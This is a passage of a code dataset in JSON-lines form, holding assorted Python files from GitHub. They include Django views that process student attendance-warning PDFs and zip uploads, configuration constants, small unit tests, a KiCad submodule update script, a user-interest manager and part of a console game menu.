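assert prom_total == 3.17 and prom_total >= 3.0  # -> "Paso el promedio con 3.17"
print(prom_total)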
\"TIFF\"]\n\t\tex = Export(path, listExt)\n\t\tself.assertTrue(ex.path, path)\n\t\tself.assertTrue(ex.listOfExtensionImg, listExt)\n\n\tdef test_list_img(self):\n\t\tpath = \"/home/travis/build/JJardin77580/plantMap/test/poject\"\n\t\tlistExt = [\"PNG\", \"JPEG\", \"TIFF\"]\n\t\tex = Export(path, listExt)\n\t\tex.fill_list_of_img()\n\t\t\n\n\tdef test_construc_archive(self):\n\t\tpath = \"/home/travis/build/JJardin77580/plantMap/test/poject\"\n\t\tlistExt = [\"PNG\", \"JPEG\", \"TIFF\"]\n\t\tex = Export(path, listExt)\n\t\tex.fill_list_of_img()\n\t\tex.fill_list_of_metadata()\n\t\tex.intersect_list_image_metadata()\n\t\tzipFile = ex.createZip()\n\n\t\twith zipfile.ZipFile(zipFile, \"r\") as z:\n\t\t\tz.extractall(path+\"/pythanUnZip\")\n\n\t\tos.chdir(path+'/pythanUnZip')\n\t\tself.assertTrue(os.path.isfile((path+'/pythanUnZip/plantmapTest_28.JPEG')))\n\t\tself.assertTrue(os.path.isfile((path+'/pythanUnZip/plantmapTest_51.JPEG')))\n\t\tself.assertTrue(os.path.isfile((path+'/pythanUnZip/metadata/plantmapTest_28.JPEG.json')))\n\t\tself.assertTrue(os.path.isfile((path+'/pythanUnZip/metadata/plantmapTest_51.JPEG.json')))\n\t\tself.assertFalse(os.path.isfile((path+'/pythanUnZip/plantmapTest_14.JPEG')))\n\nif __name__=='__main__':\n\tunittest.main()","repo_name":"Max77T/plantmap-plugin","sub_path":"test/testExport.py","file_name":"testExport.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12155227017","text":"from django.shortcuts import render\nfrom .models import *\nfrom .forms import *\nfrom django.http import HttpResponse \nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .PorcesarPdf import ProcesarPdfs\nfrom .GenInforme import *\n\nfrom django.conf import settings\n#from django.utils.encoding import str\nfrom django.template import Template, Context\n\n#from ProcesarApercibimientos import *\nimport re\nimport os\nimport zipfile\nfrom xhtml2pdf import pisa\nimport shutil\nimport datetime\n\n\n## Vista de modificacion de apercibimientos.\n\n@login_required\ndef ModAper (request):\n\n\tif request.method == 'GET':\n\t\tc = set()\n\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\tc.add(ele['Curso'])\n\t\treturn render(request,\"ModAper.html\",{'curso':c})\n\n\n\tif request.method == 'POST':\n\t\ttry:\n\t\t\tCurso = request.POST[\"Curso\"]\n\t\t\tAlumno = request.POST[\"Alumno\"]\n\t\t\tc = set()\n\t\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\t\tc.add(ele['Curso'])\t\t\n\t\t\tAlumnoApercibimiento = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Apercibimiento\").values().order_by(\"Materia\")\n\t\t\tAlumnoIgnorado = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Ignorado\").values().order_by(\"Materia\")\n\t\t\treturn render(request,\"ModAper.html\",{'AperIgnorado':AlumnoIgnorado,'AperAlumno':AlumnoApercibimiento,'curso':c,'Alumno':Alumno})\n\n\t\texcept:\n\t\t\tc = set()\n\t\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\t\tc.add(ele['Curso'])\t\n\t\t\tfor DataPost in request.POST:\n\t\t\t\tif not \"csrfmiddlewaretoken\" == DataPost:\t\t\t\t\t\n\t\t\t\t\tup = Faltas_Asistencia.objects.filter(id=int(DataPost))\t\t\t\t\t\n\t\t\t\t\tif 
+{"seq_id":"12155227017","text":"from django.shortcuts import render\nfrom .models import *\nfrom .forms import *\nfrom django.http import HttpResponse \nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .PorcesarPdf import ProcesarPdfs\nfrom .GenInforme import *\n\nfrom django.conf import settings\n#from django.utils.encoding import str\nfrom django.template import Template, Context\n\n#from ProcesarApercibimientos import *\nimport re\nimport os\nimport zipfile\nfrom xhtml2pdf import pisa\nimport shutil\nimport datetime\n\n\n## View for modifying warnings (apercibimientos).\n\n@login_required\ndef ModAper (request):\n\n\tif request.method == 'GET':\n\t\tc = set()\n\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\tc.add(ele['Curso'])\n\t\treturn render(request,\"ModAper.html\",{'curso':c})\n\n\n\tif request.method == 'POST':\n\t\ttry:\n\t\t\tCurso = request.POST[\"Curso\"]\n\t\t\tAlumno = request.POST[\"Alumno\"]\n\t\t\tc = set()\n\t\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\t\tc.add(ele['Curso'])\t\t\n\t\t\tAlumnoApercibimiento = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Apercibimiento\").values().order_by(\"Materia\")\n\t\t\tAlumnoIgnorado = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Ignorado\").values().order_by(\"Materia\")\n\t\t\treturn render(request,\"ModAper.html\",{'AperIgnorado':AlumnoIgnorado,'AperAlumno':AlumnoApercibimiento,'curso':c,'Alumno':Alumno})\n\n\t\texcept:\n\t\t\tc = set()\n\t\t\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('Curso'):\t\t\n\t\t\t\tc.add(ele['Curso'])\t\n\t\t\tfor DataPost in request.POST:\n\t\t\t\tif not \"csrfmiddlewaretoken\" == DataPost:\t\t\t\t\t\n\t\t\t\t\tup = Faltas_Asistencia.objects.filter(id=int(DataPost))\t\t\t\t\t\n\t\t\t\t\tif up.values()[0]['Estado'] == \"Apercibimiento\":\n\t\t\t\t\t\tup.update(Estado='Ignorado')\t\t\t\t\t\t\n\t\t\t\t\telif up.values()[0]['Estado'] == \"Ignorado\":\n\t\t\t\t\t\tup.update(Estado='Apercibimiento')\t\t\t\t\t\n\t\t\t\t\tAlumno = up.values()[0]['Alumno']\n\t\t\t\t\tCurso = up.values()[0]['Curso']\t\t\t\n\t\t\tAlumnoApercibimiento = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Apercibimiento\").values().order_by(\"Materia\")\n\t\t\tAlumnoIgnorado = Faltas_Asistencia.objects.filter(Curso=Curso,Alumno=Alumno,Estado=\"Ignorado\").values().order_by(\"Materia\")\n\t\t\treturn render(request,\"ModAper.html\",{'AperIgnorado':AlumnoIgnorado,'AperAlumno':AlumnoApercibimiento,'curso':c,'Alumno':Alumno})\n\t\n\t\t\t\n## Main view for the actions that can be performed.\n\n@login_required\ndef pdfprin (request):\n\tPdf_error_cnt = Faltas_Asistencia.objects.filter(Estado=\"Error\").values().count()\n\tPdf_error_fecha = Pdfs.objects.filter(Estado=\"FechaError\").values().count()\t\n\treturn render(request,\"pdfges.html\",{\"pdferrorcont\":Pdf_error_cnt,'FechaError':Pdf_error_fecha})\n\n# Uploads the pdf or zip files\n@login_required\ndef pdfsubir (request):\n\n\tif request.method == 'POST':\t\t\n\t\tform = PdfForms(request.POST,request.FILES)\t\t\n\t\t\n\t\tif form.is_valid():\t\n\t\t\ta = Pdfs()\n\t\t\ta.NombrePdf = str(datetime.date.today()) + ' PDF - ' + str(Pdfs.objects.all().count()+1)\n\t\t\ta.Estado = 'SinProcesar'\n\t\t\ta.FechaSubida = datetime.date.today()\n\t\t\ta.pdf = request.FILES['pdf']\n\t\t\ta.save()\n\t\t\tdescomprimir_zip()\n\t\t\tProcesarPdfs().start()\t\n\t\t\treturn HttpResponseRedirect('/')\t\t\n\t\n\tform = PdfForms()\n\treturn render(request,'pdfsubir.html',{'form':form})\n\n# Shows the records with errors so they can be fixed manually\n@login_required\ndef error (request):\n\n\tif request.method == 'GET':\n\n\t\tMensaje = ''\n\t\tPdf_error_cnt = Faltas_Asistencia.objects.filter(Estado=\"Error\").values().count()\n\t\tpdf_error = Faltas_Asistencia.objects.filter(Estado=\"Error\").values()\n\t\tPdfErrorFechaCnt = Pdfs.objects.filter(Estado=\"FechaError\").values().count()\n\t\tPdfErrorFecha = Pdfs.objects.filter(Estado=\"FechaError\").values()\n\n\t\tif int(PdfErrorFechaCnt) == 0 and int(Pdf_error_cnt) == 0 :\n\t\t\tMensaje = \"No existe mas problemas por solucionar\"\n\n\t\treturn render(request,\"error.html\",{'Mensaje':Mensaje,'PdfErrorFecha':PdfErrorFecha,'PdfErrorFechaCnt':PdfErrorFechaCnt,'PdfErrorCnt':Pdf_error_cnt,'pdfs':pdf_error})\n\n\tif request.method == 'POST':\n\n\t\tPdfErrorFecha = Pdfs.objects.filter(Estado=\"FechaError\")\t\t\n\t\tfor ele in PdfErrorFecha.values(\"pdf\"):\n\t\t\tos.remove(ele['pdf'])\n\t\tPdfErrorFecha.delete()\n\t\treturn HttpResponseRedirect('/error')\t\n\n\n\n# Finds the zip files, decompresses them, adds the contents to the pdf table as unprocessed, then deletes the zip\n\ndef descomprimir_zip ():\n\n\t# Cleaning directories\n\n\tfor folder, subfolders, files in os.walk('tmp/'):\n\t\t\t\tfor file in files:\n\t\t\t\t\tif file.endswith('.pdf'):\n\t\t\t\t\t\tos.remove('tmp/'+file)\n\n\t# decompressing zip\n\n\tfor folder, subfolders, files in os.walk('pdfs/'):\n\t\tfor file in files:\n\t\t\tif file.endswith('.zip'):\n\t\t\t\tcomando = 'unzip ' + 'pdfs/' + str(file) + ' -d ' + 'tmp'\n\t\t\t\tos.system(comando)\n\t\t\t\tz = Pdfs.objects.filter(pdf='pdfs/'+file)\n\t\t\t\tz.delete()\n\t\t\t\tos.system('rm '+'pdfs/'+'\\\"'+file+'\\\"')\n\n\t# Adding the decompressed pdfs\n\n\tfor folder, subfolders, files in os.walk('tmp/'):\n\t\tfor file in files:\n\t\t\tif file.endswith('.pdf'):\n\t\t\t\tinsert = Pdfs()\n\t\t\t\tinsert.NombrePdf = str(datetime.date.today()) + ' PDF - ' + str(Pdfs.objects.all().count()+1)\n\t\t\t\tinsert.Estado = 'SinProcesar'\n\t\t\t\tinsert.pdf = 'pdfs/'+str(file)\n\t\t\t\tinsert.save()\n\t\t\t\tos.system('cp '+ '\\\"' +'tmp/'+str(file)+ '\\\"' + ' pdfs/')\n\t\t\t\tos.system('rm '+'tmp/'+'\\\"'+str(file)+'\\\"')\t\n\n## Updates the erroneous records with the information provided via the form\n@login_required\ndef erroract (request,pk):\n\n\tif request.method == 'POST':\t\t\n\t\tform = PdfForms(request.POST,request.FILES)\t\n\t\tif form.is_valid():\t\n\n\t\t\t__dato2 = str(request.POST['JustifiacdadPorcentaje']).replace(',','.')\n\t\t\t__dato4 = str(request.POST['InjustificadasPorcentaje']).replace(',','.')\n\n\t\t\tact = Faltas_Asistencia.objects.filter(id=pk)\n\t\t\tact.update(\n\n\t\t\t\tJustificadasHoras = int(request.POST['JustificadasHoras'][0:request.POST['JustificadasHoras'].index(':')]),\n\t\t\t\tJustificadasPorcentaje = float(__dato2.replace('%','')),\n\t\t\t\tInjustificadasHoras = int(request.POST['InjustificadaHoras'][0:request.POST['InjustificadaHoras'].index(':')]),\n\t\t\t\tInjustificadasPorcentaje =float(__dato4.replace('%','')),\n\t\t\t\tRetrasos = \tint(request.POST['Retrasos'][0:request.POST['Retrasos'].index(':')]),\n\t\t\t\tEstado = \"Correcto\" )\n\n\t\t\tBuscarAper()\n\t\t\treturn HttpResponseRedirect('/error')\n\n\talumnos = Faltas_Asistencia.objects.filter(id=pk).values()\n\tform = Faltas_Asistencia_Actualizar()\n\treturn render(request,\"erroract.html\",{'form':form,'alumno':alumnos})\n\n\ndef BuscarAper ():\n\trejistros = Faltas_Asistencia.objects.filter(Estado=\"Correcto\").values()\n\tfor ele in rejistros :\n\t\tif (float(ele['HorasLectivas'])/float(ele['TotalPeriodo'])) <= float(0.2) :\n\t\t\tif float(ele['InjustificadasPorcentaje']) >= float(settings.APER_PORCENTAJE_1SEM) :\n\t\t\t\tact = Faltas_Asistencia.objects.filter(id=ele['id'])\n\t\t\t\tact.update(Estado='Apercibimiento')\n\t\t\telse:\n\t\t\t\tdell = Faltas_Asistencia.objects.filter(id=ele['id'])\n\t\t\t\tdell.delete()\n\t\t\t\n\t\telse :\n\t\t\tif float(ele['InjustificadasPorcentaje']) >= float(settings.APER_PORCENTAJE_MAS_1SEM) :\n\t\t\t\tact = Faltas_Asistencia.objects.filter(id=ele['id'])\n\t\t\t\tact.update(Estado='Apercibimiento')\n\t\t\telse:\n\t\t\t\tdell = Faltas_Asistencia.objects.filter(id=ele['id'])\n\t\t\t\tdell.delete()\n\n## This view generates the warnings for the students of a course\n@login_required\ndef InformePorCursos (request):\n\n\ta = set()\n\tm = set()\n\tc = set()\n\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values(\"FechaDesde\",\"FechaHasta\",\"Curso\"):\n\t\ta.add(ele['FechaDesde'].year)\n\t\tm.add(ele['FechaDesde'].month)\n\t\tm.add(ele['FechaHasta'].month)\n\t\tc.add(ele['Curso'])\n\n\tsorted(c)\n\tsorted(m)\n\tsorted(a)\n\n\tif request.method == 'POST':\t\n\n\t\ttry:\n\t\t\tError = Faltas_Asistencia.objects.filter(Estado=\"Error\",Curso=request.POST[\"Curso\"]).values().count()\n\t\texcept :\n\t\t\tError = Faltas_Asistencia.objects.filter(Estado=\"Error\").values().count()\n\n\t\tif not int(Error) > 0 :\n\t\t\tIn = GenInformeCurso(request)\t\t\t\n\t\t\tif not In.Fin :\t\t\t\n\t\t\t\treturn render(request,\"apercibimientosmenu.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False,'Mensaje':'No Existe Apercibimientos'})\t\t\n\t\n\t\telse:\n\t\t\treturn render(request,\"apercibimientosmenu.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False,'Mensaje':'Existen errores en el curso a procesar, por favor solucione antes los problemas'})\t\t\n\n\t\treturn render(request,\"apercibimientosmenu.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':True,'Mensaje':''}) \t\n\t\t\n\n\tif request.method == 'GET':\n\n\t\tProcesarPdfs().start()\n\t\treturn render(request,\"apercibimientosmenu.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False})\n\n## Report page for teachers.\n\n@login_required\ndef InformeTodosCursos (request):\n\n\ta = set()\n\tm = set()\n\tc = set()\t\t\n\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values():\n\t\ta.add(ele['FechaDesde'].year)\n\t\tm.add(ele['FechaDesde'].month)\n\t\tm.add(ele['FechaHasta'].month)\n\t\tc.add(ele['Curso'])\t\n\t\n\tsorted(c)\n\tsorted(m)\n\tsorted(a)\n\n\tif request.method == 'POST':\n\t\t\t\n\t\tano = int(request.POST['Ano'])\n\t\tmes = int(request.POST['Mes'])\n\t\tIn = InformeTodosCursosClas(request)\n\t\tif len(In.data) == 0 :\n\t\t\treturn render(request,\"apercibimientosmenutodos.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False,'Mensaje':\"No Existe datos procesables\"})\n\t\treturn render(request,\"apercibimientosmenutodos.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':True,'Mensaje':\"\"})\t\n\n\tif request.method == 'GET':\t\n\n\t\tProcesarPdfs().start()\t\n\t\treturn render(request,\"apercibimientosmenutodos.html\",{'anos':a,'mes':m,'curso':c,'AperCreado':False})\n\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\n\n\ndef AperPorMaterias (request):\n\n\ta = set()\n\tm = set()\n\tc = set()\n\tfor ele in Faltas_Asistencia.objects.filter(Estado=\"Apercibimiento\").values('FechaDesde','FechaHasta','Curso'):\n\t\ta.add(ele['FechaDesde'].year)\n\t\tm.add(ele['FechaDesde'].month)\n\t\tm.add(ele['FechaHasta'].month)\n\t\tc.add(ele['Curso'])\n\n\tsorted(m)\n\tsorted(a)\n\tsorted(c)\n\t\n\tif request.method == 'GET':\n\t\tProcesarPdfs().start()\n\t\treturn render(request,\"MenuAperMes.html\", {'anos':a,'mes':m,'curso':c})\n\t\n\tif request.method == 'POST':\n\t\tGen = InformePorMaterias(request)\t\n\t\ttry:\n\t\t\tif not Gen.InformeGen:\n\t\t\t\treturn render(request,\"MenuAperMes.html\", {'curso':c,'anos':a,'mes':m,'AperCreado':False,'Mensaje':\"No Existe datos procesables\"})\n\t\t\telse:\n\t\t\t\treturn render(request,\"MenuAperMes.html\", {'curso':c,'anos':a,'mes':m,'AperCreado':True})\n\n\t\texcept AttributeError :\n\t\t\treturn render(request,\"MenuAperMes.html\", {'curso':c,'anos':a,'mes':m,'AperCreado':False,'Mensaje':\"No Existe datos procesables\"})\n\n\ndef AcercaDe (request):\n\treturn render(request,\"acercade.html\",{'version':str(settings.VERSION)})\n\n\n\n# API views\nclass FlatasApi (viewsets.ModelViewSet):\n\tqueryset = Faltas_Asistencia.objects.filter(Estado='Apercibimiento')\n\tserializer_class = SerializerFaltasAsistencia\n\n\nclass PdfsApi (viewsets.ModelViewSet):\n\tqueryset = Pdfs.objects.all()\n\tserializer_class = PdfsSerializer\n\n\t\n\n\n\t\n\n","repo_name":"edtlopez/ApercibimientosAuto","sub_path":"DjangoProyecto/pdf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11090,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"18524165104","text":"import dataclasses\n\nfrom dreamtools import profiler\n\n\n@dataclasses.dataclass\nclass CDirectories:\n    projet: str\n    app: str = dataclasses.field(init=False)\n    pics: str = dataclasses.field(init=False)\n    registar: str = dataclasses.field(init=False)\n    calendar: str = dataclasses.field(init=False)\n\n    def __post_init__(self):\n        self.app = profiler.path_build(self.projet, \"pm\")\n        self.pics = profiler.path_build(self.projet, 'static/pics')\n        self.registar = profiler.path_build(self.projet, 'static/registar')\n        self.calendar = profiler.path_build(self.registar, 'calendar.yml')\n        self.quizz_import = profiler.path_build(self.projet, 'static/sources/question.yml')\n\n        profiler.makedirs(self.registar)\n\n\nclass Constantine:\n    DIRECTORIES: CDirectories\n    ACCESS_URI = None\n    MASTER_PWD: str\n    QUIZZ_CATEGORIES = {\n        \"avis\": [(0, \"Négatif\"), (3, \"Plutot négatif\"), (5, \"Neutre\"), (7, \"Plutot positif\"), (10, \"Très positif\")],\n        \"eval\": (1, 11),\n        \"word\": 3\n    }\n    URIS_HOSTS_ALLOWED = []\n    URIS_REQUIRED_HTTPS = False\n    SECRET_SALT = None\n    SECRET_KEY = None\n    CONTENT_TYPE= {'Content-Type': \"application/json\"}\n    OAUTH_CLIENT_ID = None\n    OAUTH_CLIENT_SECRET = None\n\n\nACCESS = {\n    'development': {\n        'uri_access_authorize': 'http://kuratoro.3p0.net:5000/authorize',\n        'uri_access_token': 'http://kuratoro.3p0.net:5000/access_token',\n        'uri_access_register': 'http://kuratoro.3p0.net:5000/register',\n        'uri_access_user': 'http://kuratoro.3p0.net:5000/access'\n    },\n    'production': {\n        'uri_access_authorize': 'https://kuratoro.3p0.net/authorize',\n        'uri_access_token': 'https://kuratoro.3p0.net/access_token',\n        'uri_access_register': 'https://kuratoro.3p0.net/register',\n        'uri_access_user': 'https://kuratoro.3p0.net/access'\n    }\n}\n\nFLASH_MESSAGE = {\n    'ERR_FORM': (\"\"\"\nFormulaire non valide\nVérifier saisie\n\"\"\", 'alert'),\n    'ERR_CAPTCHA': ('\\nERREUR CAPTCHA\\n', \"warning\"),\n    'ERR_USER_NOT_FOUND': (\n        '\\nERREUR IDENTIFICATION\\nLes informations fournies ne permettent pas de vous identifier\\n',\n        \"warning\"),\n    \"ACTION_SUCCESS\": ('\\nOpération effectuée avec succès\\n', \"success\"),\n    'REC_OK': ('\\nEnregistrement effectué\\n', \"success\"),\n    'CODE_SENT': (\n        '\\nCODE DE VALIDATION\\nUn code vous a été envoyé dans votre boite électronique; N\\'hésitez pas à vérifier vos indésirables (spams)\\n',\n        \"success\"),\n    'ERR_CODE_AUTH': ('\\nERREUR CODE\\nLe code indiqué\\n', \"warning\"),\n    'ERR_SYS': (\n        \"\\nERREUR SYSTEME\\nRaffraichir la page et réintérer l'operation\\nSi l'erreur persiste contactez votre administrateur\\n\",\n        \"alert\")\n}\n","repo_name":"couleurwest/couleurwest","sub_path":"home/controller/constantes.py","file_name":"constantes.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"2462968723","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport datetime\n\nimport mock\nimport pytest\n\nsys.path.append('.')\nimport greeter\n\n@pytest.mark.parametrize(\"hour,min,sec,expect\", [\n    ( 0, 0, 0, u'こんばんは'),\n    ( 0, 0, 1, u'こんばんは'), \n    ( 4, 59, 59, u'こんばんは'), \n    ( 5, 0, 0, u'おはよう'), \n    ( 5, 0, 1, u'おはよう'), \n    (11, 59, 59, u'おはよう'), \n    (12, 0, 0, u'こんにちは'), \n    (12, 0, 1, u'こんにちは'), \n    (17, 59, 59, u'こんにちは'), \n    (18, 0, 0, u'こんばんは'), \n    (18, 0, 1, u'こんばんは'), \n    (23, 59, 59, u'こんばんは'), \n    # (24, 0, 0, u'こんばんは'), \n])\ndef test_greet(hour, min, sec, expect):\n    class datetimeMock(datetime.datetime):\n        @classmethod\n        def now(cls):\n            return datetime.datetime(2000, 1, 1, hour, min, sec)\n    with mock.patch('datetime.datetime', datetimeMock):\n        assert greeter.greet() == expect\n\n","repo_name":"ts123/test-python","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"21807070693","text":"#!/usr/bin/python\n\n# update all the subfolders under localdir\n# code modified from `codeboy2k`\n# (deprecated)\n# you can use\n# $ git submodule update --recursive\n\nimport re\nimport os\nimport sys\nimport subprocess\n\n# set localdir to the location where you want to\n# store your local copy of the GitHub repository\nd = './kicad'\n\nenv = {}\nenv.update(os.environ)\nsep = ';' if (re.compile('^[wW][Ii][Nn]').match(sys.platform)) else ':'\n\nargs = ['git', 'submodule', 'update']\ndirs = [x for x in os.listdir(d) if os.path.isdir(os.path.join(d, x))]\n\nfor dir in dirs:\n    print(dir, ': ')\n    sys.stdout.flush()\n    os.chdir(os.path.join(d, dir))\n    subprocess.call(args)\n    os.chdir('../../')\n","repo_name":"lllaaa/kicad-offline-fp","sub_path":"update-fp.py","file_name":"update-fp.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"32860686813","text":"from data_access.controller.UserController4Mongo import UserController4Mongo\nfrom data_access.models.User import User\nfrom utils.Logger import logging\n\n\nclass UserCore:\n    def __init__(self):\n        self.controller = UserController4Mongo()\n\n    def add_user(self,_id, followed_company=None, followed_academy=None, followed_skill=None):\n        user = User(_id=_id)\n        if followed_skill:\n            user.followed_skill = followed_skill if type(followed_skill) == list else [followed_skill]\n\n        if followed_company:\n            user.followed_company = followed_company if type(followed_company) == list else [followed_company]\n\n        if followed_academy:\n            user.followed_academy = followed_academy if type(followed_academy) == list else [followed_academy]\n\n        if self.controller.get_data_by_id(_id=_id):\n            logging.error(\"user {0} already exists\".format(_id))\n            return False\n        else:\n            self.controller.insert_data(user)\n            return True\n\n    def get_user(self,_id):\n        users = self.controller.get_data_by_id(_id=_id)\n        if users:\n            return users[0]\n        else:\n            return None\n\n    def update_add_interest(self,_id, followed_company=None, followed_academy=None, followed_skill=None, max_number=5):\n        interests = self.get_interest_by_id(_id)\n        result = {}\n        # import pdb; pdb.set_trace()\n\n        if followed_company:\n            companies = interests['followed_company']\n            if len(companies) >= max_number:\n                result = {\"result\":\"failed\", \"log\":\">5\"}\n                followed_company = None\n            elif followed_company in companies:\n                result = {'result':'failed', 'log':'already followed'}\n                followed_company = None\n            else:\n                result = {'result':'success'}\n\n        if followed_academy:\n            academies = interests['followed_academy']\n            if len(academies) >= max_number:\n                result = {\"result\":\"failed\", \"log\":\">5\"}\n                followed_academy = None\n            elif followed_academy in academies:\n                result = {'result':'failed', 'log':'already followed'}\n                followed_academy = None\n            else:\n                result = {'result':'success'}\n\n        if followed_skill:\n            skills = interests['followed_skill']\n            if len(skills) >= max_number:\n                result = {\"result\":\"failed\", \"log\":\">5\"}\n                followed_skill = None\n            elif followed_skill in skills:\n                result = {'result':'failed', 'log':'already followed'}\n                followed_skill = None\n            else:\n                result = {'result':'success'}\n\n        # import pdb; pdb.set_trace()\n        try:\n            if followed_skill or followed_company or followed_academy:\n                self.controller.update_add_interest(_id, followed_company, followed_academy, followed_skill)\n        except Exception as e:\n            result = {'result':'failed', 'log':'unhandle exception'}\n        return result\n\n    def update_remove_interest(self,_id, followed_company=None, followed_academy=None, followed_skill=None):\n        self.controller.update_remove_interest(_id, followed_company, followed_academy, followed_skill)\n\n    def get_interest_by_id(self,_id,followed_company=True, followed_academy=True, followed_skill=True):\n        return self.controller.get_interest_by_id(_id, followed_company, followed_academy, followed_skill)\n\n    def is_followed(self,company_result, academy_result, terminology_result, user_id):\n        interests = self.get_interest_by_id(user_id)\n        result = {}\n        # import pdb; pdb.set_trace()\n        if company_result:\n            followed_company = interests['followed_company']\n            for k,v in company_result.items():\n                if k in followed_company:\n                    v['is_followed'] = True\n                else:\n                    v['is_followed'] = False\n            result['companies'] = company_result\n        else:\n            result['companies'] = {}\n        if academy_result:\n            followed_academy = interests['followed_academy']\n            for k,v in academy_result.items():\n                if k in followed_academy:\n                    v['is_followed'] = True\n                else:\n                    v['is_followed'] = False\n            result['academies'] = academy_result\n        else:\n            result['academies'] = {}\n\n        if terminology_result:\n            followed_skill = interests['followed_skill']\n            terminology = self._is_terminology_followed(terminology_result, followed_skill)\n            result['terminologys'] = terminology_result\n        else:\n            result['terminologys'] = {}\n\n        return result\n\n    def _is_terminology_followed(self, terminology_result, followed_skill):\n        for k, v in terminology_result.items():\n            if k == 'terminology_detail':\n                if v['name'] in followed_skill:\n                    v['is_followed'] = True\n                else:\n                    v['is_followed'] = False\n            elif type(v) == list:\n                for item in v:\n                    self._is_terminology_followed(item, followed_skill)\n            elif type(v) == dict:\n                self._is_terminology_followed(v, followed_skill)\n        return terminology_result\n","repo_name":"Will-Holden/kb_demo","sub_path":"online_processor/core/user/UserCore.py","file_name":"UserCore.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
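UserCore.update_add_interest guards every follow with the same two checks — a per-category cap (max_number, default 5) and de-duplication — before touching MongoDB. That guard, extracted as a pure function for clarity (the function name is illustrative):

def can_follow(current, item, max_number=5):
    # mirrors the cap / duplicate checks in update_add_interest above
    if len(current) >= max_number:
        return {"result": "failed", "log": ">%d" % max_number}
    if item in current:
        return {"result": "failed", "log": "already followed"}
    return {"result": "success"}

print(can_follow(["acme"], "acme"))                # already followed
print(can_follow(["a", "b", "c", "d", "e"], "f"))  # over the cap
print(can_follow(["a"], "b"))                      # success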
+{"seq_id":"25063334519","text":"from filehandling import unfile\nfrom movement import getch\nfrom clear import resize_and_clear as clear\nfrom button import change_button as button\nfrom about import print_about as about\nfrom introscreen import intro as intro\n\ndef logo(): # printing logo\n    with open(\"menu.uie\") as picture:\n        for line in picture:\n            print(line[:-1])\n\n    # maps, current_choice, last_input, user\n\n\ndef display_menu(args):\n    \n    maps = args['maps']\n    current_choice = args['current_choice']\n    user_input = args['last_input']\n    user = args['player']\n    \n    user.reset()\n    logo()\n    \n    current_choice = button(user_input, current_choice)\n    \n    print('\\n\\n')\n    print(\"player:\".rjust(65), \"name:\".rjust(24))\n    print(user.player_char.rjust(71), user.name.rjust(27))\n    user_input = getch()\n\n    if user_input == '\\r' and current_choice == 4:\n        return\n    if user_input == '\\r' and current_choice == 1:\n        # Change map to lvl 1\n        # Can be modified to show story\n\n        clear()\n        intro()\n        board = unfile(maps[1])\n        original_board = unfile(maps[1])\n        return (1, None, board, original_board)\n\n    if user_input == '\\r' and current_choice == 2:\n        # Change to about screen\n\n        clear()\n        about()\n        clear()\n        logo()\n        return ('menu', current_choice, user_input)\n\n    if user_input == '\\r' and current_choice == 3:\n        # Change to about screen\n\n        clear()\n        about()\n        clear()\n        logo()\n        return ('menu', current_choice, user_input)\n\n    else:\n        clear()\n        logo()\n        return ('menu', current_choice, user_input)\n\ndef inventory(player):\n    # numbers in rjust are calculated to sum up \n    # with characters to 55 because this is the length of first print\n    # all is made to be a visual representation of what is to be printed\n    print(\"=============================================\")\n    print(\"#\")\n    print('#', \"Gold:\".rjust(19),\n          '{}'.rjust(11).format(player.gold))\n    print('#', \"Health potions:\".rjust(19),\n          '{}'.rjust(11).format(player.potions))\n    print(\"#\")\n    print(\"+++++++++++++++++++++++++++++++++++++++++++++\")\n    print('#', '\\x1b[0;33m{}\\x1b[0m'.rjust(10).format(player.name),\n          '{}'.rjust(5).format(player.player_char),\n          'Life:'.rjust(8),\n          '{}'.rjust(10).format(player.life))\n    print('#')\n    print('#', 'Level:'.rjust(19),\n          '{}'.rjust(11).format(player.level))\n    print('#', 'Experience:'.rjust(19),\n          